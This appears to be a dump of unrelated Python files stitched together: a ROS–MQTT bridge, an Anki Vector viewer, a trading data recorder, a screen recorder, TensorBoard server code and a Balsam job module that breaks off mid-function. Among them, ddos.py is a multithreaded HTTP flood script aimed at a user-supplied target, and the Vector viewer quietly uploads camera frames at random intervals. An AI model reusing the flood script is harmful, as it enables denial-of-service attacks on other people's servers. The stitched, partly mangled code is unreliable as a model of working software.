self._interval = 0 if frequency is None else 1.0 / frequency
self._latched = latched
self._qos = qos
        if isinstance(msg_type, str):
            msg_type = lookup_object(msg_type)
        if not issubclass(msg_type, rospy.Message):
            raise TypeError(
                "msg_type should be a rospy.Message subclass or its string "
                "representation")
rospy.Subscriber(topic_from, msg_type, self._callback_ros)
def _callback_ros(self, msg):
rospy.logdebug("ROS received from {}".format(self._topic_from))
now = rospy.get_time()
if now - self._last_published >= self._interval:
self._publish(msg)
self._last_published = now
def _publish(self, msg):
payload = bytearray(self._serialize(extract_values(msg)))
self._mqtt_client.publish(
topic=self._topic_to, payload=payload,
qos=self._qos, retain=self._latched)
class MqttToRosBridge(Bridge):
u""" Bridge from MQTT to ROS topic
:param str topic_from: incoming MQTT topic path
:param str topic_to: outgoing ROS topic path
:param class msg_type: subclass of ROS Message
:param (float|None) frequency: publish frequency
:param int queue_size: ROS publisher's queue size (default: 10)
:param bool latch: latch the ROS topic (default: False)
:param int qos: MQTT quality of service (default: 0, max: 2)
"""
def __init__(self, topic_from, topic_to, msg_type, frequency=None,
queue_size=10, latched=False, qos=0):
self._topic_from = self._extract_private_path(topic_from)
self._topic_to = topic_to
        if isinstance(msg_type, str):
            msg_type = lookup_object(msg_type)
        if not issubclass(msg_type, rospy.Message):
            raise TypeError(
                "msg_type should be a rospy.Message subclass or its string "
                "representation")
self._msg_type = msg_type
self._queue_size = queue_size
self._latched = latched
self._qos = qos
self._last_published = rospy.get_time()
self._interval = None if frequency is None else 1.0 / frequency
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(self._topic_from, qos=self._qos)
self._mqtt_client.message_callback_add(self._topic_from, self._callback_mqtt)
self._publisher = rospy.Publisher(
self._topic_to, self._msg_type, queue_size=self._queue_size, latch=self._latched)
def _callback_mqtt(self, client, userdata, mqtt_msg):
u""" callback from MQTT
:param mqtt.Client client: MQTT client used in connection
:param userdata: user defined data
:param mqtt.MQTTMessage mqtt_msg: MQTT message
"""
rospy.logdebug("MQTT received from {}".format(mqtt_msg.topic))
now = rospy.get_time()
if self._interval is None or now - self._last_published >= self._interval:
try:
ros_msg = self._create_ros_message(mqtt_msg)
self._publisher.publish(ros_msg)
self._last_published = now
except Exception as e:
rospy.logerr(e)
def _create_ros_message(self, mqtt_msg):
u""" create ROS message from MQTT payload
:param mqtt.Message mqtt_msg: MQTT Message
:return rospy.Message: ROS Message
"""
msg_dict = self._deserialize(mqtt_msg.payload)
return populate_instance(msg_dict, self._msg_type())
class SubscribeBridge(MqttToRosBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_from.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(SubscribeBridge, self).__init__(self._mqtt_topic, topic_to, msg_type, frequency, latched, qos)
rospy.loginfo('SubscribeBridge: subscribe ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'ros2mqtt_subscribe',
'args': {
'topic_from': topic_from,
'topic_to': self._mqtt_topic,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=True)
class PublishBridge(RosToMqttBridge):
def __init__(self, topic_from, topic_to, msg_type, control_topic="__dynamic_server", frequency=None, latched=False, qos=0):
self._control_topic = control_topic + '/topic/' + topic_to.replace('/', '_')
self._mqtt_topic = control_topic + '_DATA_' + (topic_from + "_TO_" + topic_to).replace('/','_')
super(PublishBridge, self).__init__(topic_from, self._mqtt_topic, msg_type, frequency, latched, qos)
rospy.loginfo('PublishBridge: publish from ROS topic %s to topic %s via MQTT %s' %
(topic_from, topic_to, self._mqtt_topic)
)
cmd = {
'op': 'mqtt2ros_subscribe',
'args': {
'topic_from': self._mqtt_topic,
'topic_to': topic_to,
'msg_type': msg_type,
'frequency': frequency,
'latched': latched,
'qos': qos
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._control_topic, payload=payload,
qos=2, retain=True)
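# A minimal sketch of the dynamic bridging pattern implemented by the classes above
# (topic and message-type names are illustrative; both ROS sides must talk to the same
# MQTT broker and use the same control_topic):
#
#     # On the remote ROS side: serve bridge requests arriving over MQTT.
#     DynamicBridgeServer(control_topic="__dynamic_server")
#
#     # On the local ROS side: mirror a remote ROS topic into a local one ...
#     SubscribeBridge("/remote/scan", "/local/scan", "sensor_msgs.msg:LaserScan")
#     # ... or publish a local topic so the remote side re-publishes it.
#     PublishBridge("/local/cmd_vel", "/remote/cmd_vel", "geometry_msgs.msg:Twist")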
class LocalServiceProxy(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._register_service_topic = control_topic + '/service/register/' + (local_server + "_TO_" + remote_server).replace('/','_')
rospy.loginfo('LocalServiceProxy: offer remote access to ROS service %s as %s via MQTT' %
(local_server, remote_server)
)
cmd = {
'op': 'register',
'args': {
'local_server': remote_server,
'remote_server': local_server,
'srv_type': srv_type,
'control_topic': control_topic
}
}
payload = bytearray(self._serialize(cmd))
self._mqtt_client.publish(
topic=self._register_service_topic, payload=payload,
qos=2, retain=True)
class RemoteService(Bridge):
def __init__(self, local_server, remote_server, srv_type, control_topic="__remote_server"):
self._local_server = local_server
self._remote_server = remote_server
self._control_topic = control_topic
self._mqtt_topic_request = self._control_topic + '/service/request/' + (local_server + "_TO_" + remote_server).replace('/','_')
self._srv_type_name = srv_type
self._srv_type = lookup_object(self._srv_type_name)
self._serviceproxy = rospy.Service(self._local_server, self._srv_type, self._ros_handler)
def _ros_handler(self, req):
responses = {}
lock = Condition()
def __response_handler(client, userdata, mqtt_msg):
msg_dict = self._deserialize(mqtt_msg.payload)
rospy.logdebug('got response for %s' % msg_dict['id'])
with lock:
responses[msg_dict['id']] = msg_dict['response']
                lock.notify_all()
rospy.logdebug('local service %s called.' % self._local_server)
# generate a unique ID
request_id = str(uuid4())
# build a request to send to the external client
request_message = {
"op": "call_service",
"id": request_id,
"response_topic": self._control_topic + '/service/response/' + request_id,
"type": self._srv_type_name,
"service": self._remote_server,
"args": extract_values(req)
}
# Adding the correct topic to subscribe to
self._mqtt_client.subscribe(request_message['response_topic'], qos=2)
self._mqtt_client.message_callback_add(request_message['response_topic'], __response_handler)
payload = bytearray(self._serialize(request_message))
self._mqtt_client.publish(
topic=self._mqtt_topic_request, payload=payload,
qos=2, retain=False)
# wait for a response
while not rospy.is_shutdown() and request_id not in responses.keys():
with lock:
lock.wait(1) # check for shutdown every 1 second
resp = responses[request_id]
del responses[request_id]
self._mqtt_client.unsubscribe(request_message['response_topic'])
# assemble response object
response_type = lookup_object(self._srv_type_name+"Response")
# create response object
r = response_type()
# and populate it
if resp is None:
rospy.logerr('Service Request could not be completed')
raise rospy.ROSException('Service Request could not be completed')
populate_instance(resp, r)
return r
__all__ = [
'create_bridge', 'Bridge', 'RosToMqttBridge', 'MqttToRosBridge',
'DynamicBridgeServer', 'SubscribeBridge', 'PublishBridge', 'RemoteService', 'LocalServiceProxy']
|
viewer.py
|
# Copyright (c) 2018 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Displays camera feed from Vector's camera.
"""
# __all__ should order by constants, event classes, other classes, functions.
__all__ = ['ViewerComponent', 'Viewer3DComponent']
import multiprocessing as mp
import sys
import threading
import time
import random
import uuid
from datetime import datetime, timedelta
try:
from PIL import Image
except ImportError:
sys.exit("Cannot import from PIL: Do `pip3 install --user Pillow` to install")
from . import util
from .events import Events
from .ml.agent import MLAgent
class ViewerComponent(util.Component):
"""This component opens a window and renders the images obtained from Vector's camera.
This viewer window is run in a separate process spawned by :func:`~ViewerComponent.show`.
Being on a separate process means the rendering of the camera does not block the main thread
of the calling code, and allows the viewer to have its own ui thread which it can operate on.
:func:`~ViewerComponent.close` will stop the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(show_viewer=True) as robot:
time.sleep(5)
:param robot: A reference to the owner Robot object. (May be :class:`None`)
"""
def __init__(self, robot):
super().__init__(robot)
self.overlays: list = []
self._close_event: mp.Event = None
self._frame_queue: mp.Queue = None
self._process = None
self._mlAgent = MLAgent()
self._last_upload_timestamp = 0
self._next_upload_timestamp = 0
def show(self, timeout: float = 10.0, force_on_top: bool = True) -> None:
"""Render a video stream using the images obtained from
Vector's camera feed.
.. testcode::
import anki_vector
import time
with anki_vector.Robot() as robot:
robot.viewer.show()
time.sleep(10)
:param timeout: Render video for the given time. (Renders forever, if timeout not given.)
:param force_on_top: Specifies whether the window should be forced on top of all others.
"""
from . import camera_viewer
self.robot.camera.init_camera_feed()
ctx = mp.get_context('spawn')
self._close_event = ctx.Event()
self._frame_queue = ctx.Queue(maxsize=4)
self._process = ctx.Process(target=camera_viewer.main,
args=(self._frame_queue,
self._close_event,
self.overlays,
timeout,
force_on_top),
daemon=True,
name="Camera Viewer Process")
self._process.start()
def close(self) -> None:
"""Stop rendering video of Vector's camera feed and close the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(show_viewer=True) as robot:
time.sleep(10)
robot.viewer.close()
"""
if self._close_event:
self._close_event.set()
self._close_event = None
if self._frame_queue:
try:
self._frame_queue.put(None, False)
except mp.queues.Full:
pass
self._frame_queue = None
if self._process:
self._process.join(timeout=5)
if self._process.is_alive():
self._process.terminate()
self._process = None
def _get_next_upload_time_delta(self):
"""
Generate the timedelta after which the next image should be uploaded.
Currently the timedelta is configured to be between 20 sec and 1 minute
"""
rand = random.randint(20, 60)
delta = timedelta(seconds=rand)
return delta
def enqueue_frame(self, image: Image.Image):
"""Sends a frame to the viewer's rendering process. Sending `None` to the viewer
will cause it to gracefully shutdown.
.. note::
This function will be called automatically from the camera feed when the
:class:`~anki_vector.robot.Robot` or :class:`~anki_vector.robot.AsyncRobot`
object is created with ``show_viewer=True``.
.. code-block:: python
import anki_vector
from PIL.Image import Image
image = Image()
with anki_vector.Robot(show_viewer=True) as robot:
robot.viewer.enqueue_frame(image)
:param image: A frame from Vector's camera.
"""
close_event = self._close_event
current_time = datetime.now()
if not self._last_upload_timestamp or current_time >= self._next_upload_timestamp:
if self._last_upload_timestamp:
imageName = uuid.uuid4()
self._mlAgent.upload_image(image, 'robot' + str(imageName))
self._last_upload_timestamp = current_time
self._next_upload_timestamp = \
current_time + self._get_next_upload_time_delta()
processed_image = self._mlAgent.run_inference(image)
if self._frame_queue is not None and close_event is not None and not close_event.is_set():
try:
self._frame_queue.put(processed_image, False)
except mp.queues.Full:
pass
    def _apply_overlays(self, image: Image.Image) -> Image.Image:
"""Apply all overlays attached to viewer instance on to image from camera feed."""
for overlay in self.overlays:
overlay.apply_overlay(image)
return image
class _ExternalRenderCallFunctor(): # pylint: disable=too-few-public-methods
"""Externally specified OpenGL render function.
Allows extra geometry to be rendered into OpenGLViewer.
:param f: function to call inside the rendering loop
:param f_args: a list of arguments to supply to the callable function
"""
def __init__(self, f: callable, f_args: list):
self._f = f
self._f_args = f_args
def invoke(self, user_data_queue):
"""Calls the internal function"""
self._f(*self._f_args, user_data_queue=user_data_queue)
class Viewer3DComponent(util.Component):
"""This component opens a window and renders the a 3D view obtained from Vector's navigation map.
This viewer window is run in a separate process spawned by :func:`~Viewer3DComponent.show`.
Being on a separate process means the rendering of the 3D view does not block the main thread
of the calling code, and allows the viewer to have its own ui thread with which it can render OpenGL.
:func:`~Viewer3DComponent.close` will stop the viewer process.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_nav_map_feed=True, show_3d_viewer=True) as robot:
time.sleep(5)
:param robot: A reference to the owner Robot object. (May be :class:`None`)
"""
def __init__(self, robot):
super().__init__(robot)
self.overlays: list = []
self._close_event: mp.Event = None
self._input_intent_queue: mp.Queue = None
self._nav_map_queue: mp.Queue = None
self._world_frame_queue: mp.Queue = None
self._extra_render_function_queue: mp.Queue = None
self._user_data_queue: mp.Queue = None
self._process: mp.process.BaseProcess = None
self._update_thread: threading.Thread = None
self._last_robot_control_intents = None
self.connecting_to_cube = False
def show(self, show_viewer_controls: bool = True):
"""Spawns a background process that shows the navigation map in a 3D view.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_nav_map_feed=True) as robot:
robot.viewer_3d.show()
time.sleep(5)
robot.viewer_3d.close()
:param show_viewer_controls: Specifies whether to draw controls on the view.
"""
from . import opengl
ctx = mp.get_context('spawn')
self._close_event = ctx.Event()
self._input_intent_queue = ctx.Queue(maxsize=10)
self._nav_map_queue = ctx.Queue(maxsize=10)
self._world_frame_queue = ctx.Queue(maxsize=10)
self._extra_render_function_queue = ctx.Queue(maxsize=1)
self._user_data_queue = ctx.Queue()
self._update_thread = threading.Thread(target=self._update,
args=(),
daemon=True,
name="3D Viewer Update Thread")
self._update_thread.start()
self._process = ctx.Process(target=opengl.main,
args=(self._close_event,
self._input_intent_queue,
self._nav_map_queue,
self._world_frame_queue,
self._extra_render_function_queue,
self._user_data_queue,
show_viewer_controls),
daemon=True,
name="3D Viewer Process")
self._process.start()
self.robot.events.subscribe(self._on_robot_state_update, Events.robot_state)
self.robot.events.subscribe(self._on_nav_map_update, Events.nav_map_update)
@property
def user_data_queue(self):
"""A queue to send custom data to the 3D viewer process.
Best used in conjunction with :func:`~Viewer3DComponent.add_render_call` to place
a process on the 3D viewer process then obtain data from this queue.
"""
return self._user_data_queue
def add_render_call(self, render_function: callable, *args):
"""Allows external functions to be injected into the viewer process which
will be called at the appropriate time in the rendering pipeline.
Example usage to draw a dot at the world origin:
.. code-block:: python
import time
import anki_vector
def my_render_function(user_data_queue):
glBegin(GL_POINTS)
glVertex3f(0, 0, 0)
glEnd()
with anki_vector.Robot(enable_nav_map_feed=True, show_3d_viewer=True) as robot:
robot.viewer_3d.add_render_call(my_render_function)
time.sleep(10)
:param render_function: The delegated function to be invoked in the pipeline.
:param args: An optional list of arguments to send to the render_function
the arguments list must match the parameters accepted by the
supplied function.
"""
self._extra_render_function_queue.put(_ExternalRenderCallFunctor(render_function, args))
def close(self):
"""Closes the background process showing the 3D view.
.. testcode::
import anki_vector
import time
with anki_vector.Robot(enable_nav_map_feed=True) as robot:
robot.viewer_3d.show()
time.sleep(5)
robot.viewer_3d.close()
"""
if self._close_event:
self._close_event.set()
self._close_event = None
if self._update_thread:
self._update_thread.join(timeout=2)
self._update_thread = None
self._input_intent_queue = None
self._nav_map_queue = None
self._world_frame_queue = None
if self._process:
self._process.join(timeout=5)
if self._process.is_alive():
self._process.terminate()
self._process = None
def connect_to_cube(self):
'''Connect to light cube'''
if self.connecting_to_cube:
return
self.connecting_to_cube = True
self.robot.world.connect_cube()
self.connecting_to_cube = False
return
def _update(self):
"""Reads most recently stored user-triggered intents, and sends
        motor messages to the robot if the intents should affect the robot's
current motion.
Called on SDK thread, for controlling robot from input intents
pushed from the OpenGL thread.
:param robot: the robot being updated by this View Controller
"""
close_event = self._close_event
while close_event and not close_event.is_set():
try:
input_intents = self._input_intent_queue.get(True, timeout=2) # type: RobotControlIntents
# Track last-used intents so that we only issue motor controls
# if different from the last frame (to minimize it fighting with an SDK
# program controlling the robot):
old_intents = self._last_robot_control_intents
self._last_robot_control_intents = input_intents
if not old_intents or (old_intents.left_wheel_speed != input_intents.left_wheel_speed
or old_intents.right_wheel_speed != input_intents.right_wheel_speed):
self.robot.motors.set_wheel_motors(input_intents.left_wheel_speed,
input_intents.right_wheel_speed,
input_intents.left_wheel_speed * 4,
input_intents.right_wheel_speed * 4,
_return_future=True)
if not old_intents or old_intents.lift_speed != input_intents.lift_speed:
self.robot.motors.set_lift_motor(input_intents.lift_speed, _return_future=True)
if not old_intents or old_intents.head_speed != input_intents.head_speed:
self.robot.motors.set_head_motor(input_intents.head_speed, _return_future=True)
if input_intents.connect_to_light_block and (old_intents is None or not old_intents.connect_to_light_block):
threading.Thread(target=self.connect_to_cube).start()
except mp.queues.Empty:
pass
close_event = self._close_event
def _on_robot_state_update(self, robot, *_):
"""Called from SDK process whenever the robot state is updated (so i.e. every engine tick).
Note:
This is called from the SDK process, and will pass the nav map data to the
3D viewer process.
We can safely capture any robot and world state here, and push to OpenGL
(main) process via a multiprocessing queue.
"""
from .opengl import opengl_vector
world_frame = opengl_vector.WorldRenderFrame(robot, self.connecting_to_cube)
queue = self._world_frame_queue
if queue:
try:
queue.put(world_frame, False)
except mp.queues.Full:
pass
def _on_nav_map_update(self, _robot, _event_type, msg):
"""Called from SDK process whenever the nav map is updated.
Note:
This is called from the SDK process, and will pass the nav map data to the
3D viewer process.
We can safely capture any robot and world state here, and push to OpenGL
(main) process via a multiprocessing queue.
"""
queue = self._nav_map_queue
if queue:
try:
queue.put(msg, False)
except mp.queues.Full:
pass
|
runDataRecording.py
|
# encoding: UTF-8
from __future__ import print_function
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
    Handle error events.
    After every login the server pushes all errors generated that day again,
    so these messages are not suitable for writing to the log.
    """
    error = event.dict_['data']
    print(u'Error code: %s, error message: %s' % (error.errorID, error.errorMsg))
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*20)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(dataRecorder)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
le.info(u'注册日志事件监听')
me.connect('CTP')
le.info(u'连接CTP接口')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录守护父进程')
DAY_START = time(8, 57) # 日盘启动和停止时间
DAY_END = time(15, 18)
NIGHT_START = time(20, 57) # 夜盘启动和停止时间
NIGHT_END = time(2, 33)
p = None # 子进程句柄
    while True:
        currentTime = datetime.now().time()
        recording = False
        # Determine which trading session the current time falls in
        if ((currentTime >= DAY_START and currentTime <= DAY_END) or
            (currentTime >= NIGHT_START) or
            (currentTime <= NIGHT_END)):
            recording = True
        # Filter out weekend periods: all day Saturday, the Friday night session, the Sunday day session
        if ((datetime.today().weekday() == 6) or
            (datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
            (datetime.today().weekday() == 0 and currentTime < DAY_START)):
            recording = False
        # During recording hours, start the child process if it is not running
        if recording and p is None:
            le.info(u'Starting child process')
            p = multiprocessing.Process(target=runChildProcess)
            p.start()
            le.info(u'Child process started successfully')
        # Outside recording hours, shut the child process down
        if not recording and p is not None:
            le.info(u'Stopping child process')
            p.terminate()
            p.join()
            p = None
            le.info(u'Child process stopped successfully')
        sleep(5)
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
|
ddos.py
|
import threading
import socket
target = input("kimi sikmek istersin muwah: ")
port = 80;
fake_ip = '99.30.40.31'
already = 0;
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "r\n\r\n").encode('ascii'), (target, port))
already+1
print(already + "packets sending")
s.close
for i in range(100000):
thread = threading.Thread(target=attack)
thread.start()
|
1.2.2.4-screen_recording.py
|
from PIL import ImageGrab
import numpy as np
from cv2 import cv2
import datetime
from pynput import keyboard
import threading
flag = False
def video_record():
print("start recording at %s!" % datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
    p = ImageGrab.grab()  # grab the current screen
    a, b = p.size  # get the size of the current screen
fourcc = cv2.VideoWriter_fourcc(*'XVID')
    # frame rate of 12
video = cv2.VideoWriter('%s.avi' % datetime.datetime.now().strftime('%Y-%m-%d %H-%M-%S'), fourcc, 12, (a, b))
while True:
img = ImageGrab.grab()
img_cvt = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
video.write(img_cvt)
if flag:
print("stop recording!")
break
video.release()
def on_press(key):
"""
:param key:
:return:
"""
global flag
if key == keyboard.Key.esc:
flag = True
print("stop monitor!")
        return False  # returning False stops the keyboard listener
if __name__ == '__main__':
th = threading.Thread(target=video_record)
th.start()
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
# Known issues: the capture rate depends on processor speed (only about 10 FPS on my laptop, which is low);
# because of this, playback of the written file appears sped up or slowed down; the bitrate is also too high.
|
server.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module for building TensorBoard servers.
This is its own module so it can be used in both actual code and test code.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import event_accumulator
from tensorflow.python.summary.impl import gcs
from tensorflow.tensorboard.backend import handler
# How many elements to store per tag, by tag type
TENSORBOARD_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 4,
event_accumulator.AUDIO: 4,
event_accumulator.SCALARS: 1000,
event_accumulator.HISTOGRAMS: 50,
}
def ParseEventFilesSpec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
for specification in logdir.split(','):
# If it's a gcs or hdfs path, don't split on colon
if gcs.IsGCSPath(specification) or specification.startswith('hdfs://'):
run_name = None
path = specification
# If the spec looks like /foo:bar/baz, then we assume it's a path with a
# colon.
elif ':' in specification and specification[0] != '/':
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if not gcs.IsGCSPath(path):
path = os.path.realpath(path)
files[path] = run_name
return files
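# For example (paths are illustrative), the spec string
#     'training:/tmp/logs/train,/tmp/logs/eval'
# parses to
#     {'/tmp/logs/train': 'training', '/tmp/logs/eval': None}
# (with each non-GCS path normalized by os.path.realpath), and the unnamed entry is
# later displayed under its own path.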
def ReloadMultiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
duration = time.time() - start
logging.info('Multiplexer done loading. Load took %0.1f secs', duration)
def StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
for path in path_to_run.keys():
if gcs.IsGCSPath(path):
gcs.CheckIsSupported()
logging.info(
'Assuming %s is intended to be a Google Cloud Storage path because '
'it starts with %s. If it isn\'t, prefix it with \'/.\' (i.e., use '
'/.%s instead)', path, gcs.PATH_PREFIX, path)
def _ReloadForever():
while True:
ReloadMultiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_ReloadForever)
thread.daemon = True
thread.start()
return thread
class ThreadedHTTPServer(socketserver.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
"""A threaded HTTP server."""
daemon_threads = True
def BuildServer(multiplexer, host, port, logdir):
"""Sets up an HTTP server for running TensorBoard.
Args:
multiplexer: An `EventMultiplexer` that the server will query for
information about events.
host: The host name.
port: The port number to bind to, or 0 to pick one automatically.
logdir: The logdir argument string that tensorboard started up with.
Returns:
A `BaseHTTPServer.HTTPServer`.
"""
factory = functools.partial(handler.TensorboardHandler, multiplexer, logdir)
return ThreadedHTTPServer((host, port), factory)
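# A minimal sketch of how these pieces compose into a running TensorBoard backend (the
# EventMultiplexer import path and constructor arguments are assumptions based on the
# TensorFlow code base of the same era):
#
#     from tensorflow.python.summary import event_multiplexer
#
#     path_to_run = ParseEventFilesSpec('/tmp/logs')
#     multiplexer = event_multiplexer.EventMultiplexer(
#         size_guidance=TENSORBOARD_SIZE_GUIDANCE)
#     StartMultiplexerReloadingThread(multiplexer, path_to_run, load_interval=60)
#     server = BuildServer(multiplexer, 'localhost', 6006, '/tmp/logs')
#     server.serve_forever()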
|
transitions.py
|
'''BalsamJob Transitions
The user selects ``NUM_TRANSITION_THREADS`` processes to run
alongside the main Launcher process. These are created with ``multiprocessing.Process``
and communicate with the Launcher through a ``multiprocessing.Queue`` (or a
PriorityQueue via a ``multiprocessing.managers.SyncManager``)
The transition processes pull jobs from the queue, execute the necessary
transition function, and signal completion by putting a status message back on a
status queue. These transition processes install their own SIGINT and SIGTERM
handlers (setting an exit flag), so that they can finish the current transition and
exit gracefully, under control of the main Launcher process.
'''
from collections import defaultdict
import glob
import multiprocessing
import os
from io import StringIO
from traceback import print_exc
import random
import signal
import shutil
import subprocess
import time
import tempfile
from django import db
from django.db.models.functions import Cast, Substr
from django.db.models import CharField
from balsam.core import transfer
from balsam.core.models import BalsamJob, PROCESSABLE_STATES
from balsam.launcher.util import get_tail
import logging
logger = logging.getLogger(__name__)
JOBCACHE_LIMIT = 1000
PREPROCESS_TIMEOUT_SECONDS = 300
POSTPROCESS_TIMEOUT_SECONDS = 300
EXIT_FLAG = False
class BalsamTransitionError(Exception): pass
def handler(signum, stack):
global EXIT_FLAG
EXIT_FLAG = True
class TransitionProcessPool:
'''Launch and terminate the transition processes'''
def __init__(self, num_threads, wf_name):
self.procs = [multiprocessing.Process(
target=main, args=(i, num_threads, wf_name),
name=self.__class__.__name__+str(i))
for i in range(num_threads)]
logger.info(f"Starting {len(self.procs)} transition processes")
db.connections.close_all()
for proc in self.procs:
proc.daemon = True
proc.start()
def terminate(self):
'''Terminate workers via signal and process join'''
logger.debug("Sending sigterm and waiting on transition processes")
for proc in self.procs:
proc.terminate()
for proc in self.procs:
proc.join()
logger.info("All Transition processes joined: done.")
@db.transaction.atomic
def fail_update(failed_jobs):
for job in failed_jobs:
try:
failmsg = job.__fail_msg
except AttributeError:
failmsg = ''
job.refresh_from_db()
job.update_state('FAILED', failmsg)
def update_states_from_cache(job_cache):
# Update states of fast-forwarded jobs
update_jobs = defaultdict(list)
failed_jobs = []
for job in job_cache:
if job.state != job.__old_state:
job.__old_state = job.state
if job.state != 'FAILED':
update_jobs[job.state].append(job.pk)
else:
failed_jobs.append(job)
if failed_jobs:
fail_update(failed_jobs)
for newstate, joblist in update_jobs.items():
BalsamJob.batch_update_state(joblist, newstate)
def select_range(num_threads, thread_idx):
HEX_DIGITS = '0123456789abcdef'
chunk, rem = divmod(len(HEX_DIGITS), num_threads)
start, end = thread_idx*chunk, (thread_idx+1)*chunk
my_digits = HEX_DIGITS[start:end]
if thread_idx < rem:
my_digits += HEX_DIGITS[thread_idx-rem]
manager = BalsamJob.source
processable = manager.by_states(PROCESSABLE_STATES).filter(lock='')
processable = processable.order_by('-state') # put AWAITING_PARENTS last to avoid starvation
logger.debug(f"There are {processable.count()} processable jobs")
if num_threads == 1:
qs = processable
else:
qs = processable.annotate(first_pk_char=Substr(Cast('pk', CharField(max_length=36)) , 1, 1))
qs = qs.filter(first_pk_char__in=my_digits)
qs = qs.values_list('pk', flat=True)[:JOBCACHE_LIMIT]
logger.debug(f"TransitionThread{thread_idx} select:\n{qs.query}")
return list(qs)
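# For example, with num_threads=3 the 16 hex digits split as chunk=5, rem=1, so thread 0
# gets '01234' plus the leftover 'f', thread 1 gets '56789' and thread 2 gets 'abcde';
# each transition process then only competes for jobs whose primary key (as a hex UUID
# string) starts with one of its own digits.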
def refresh_cache(job_cache, num_threads, thread_idx):
manager = BalsamJob.source
to_acquire = select_range(num_threads, thread_idx)
logger.debug(f"TransitionThread{thread_idx} will try to acquire: {[str(id)[:8] for id in to_acquire]}")
